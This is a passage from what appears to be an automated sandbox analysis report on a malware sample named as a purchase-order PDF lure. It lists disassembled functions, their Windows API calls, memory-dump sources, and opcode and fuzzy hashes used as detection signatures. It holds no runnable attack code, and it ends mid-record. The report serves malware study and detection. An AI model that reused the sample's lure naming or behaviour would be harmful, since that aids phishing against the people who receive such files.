                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2223660684-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                                                                                                                                                                                                                                            Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 004472B0
                                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 004472BE
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2783949968-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                                                                                                                                                            • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                                                                                                                                                                                                            Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 00417D1A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 00417D31
                                                                                                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 00417D4F
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3521780317-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                                                                                                                                                                                                                                            Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00471144
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0047114D
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                                                                                                                                                                                            • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                                                                                                                                                                                                            Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                                                                                                                                                                                                                            Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                                                                                                                                                                                                            • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                                                                                                                                                                                                                                            Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                                                                                                                                                                                                            • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                                                                                                                                                                                                                                            Function 0041405D Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                                                                                                                                                                                            • __getptd_noexit.LIBCMT ref: 00414080
                                                                                                                                                                                                                                                                                                            • __freeptd.LIBCMT ref: 0041408A
                                                                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 00414093
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3182216644-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                                                                                                                                                                                                                                            Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                            • String ID: $8'I
                                                                                                                                                                                                                                                                                                            • API String ID: 2358735015-3608026889
                                                                                                                                                                                                                                                                                                            • Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                                                                                                                                                                                                                                            Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                                                                                                                                                                                                                                            • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                                                                                                            • API String ID: 3380330463-3941886329
                                                                                                                                                                                                                                                                                                            • Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
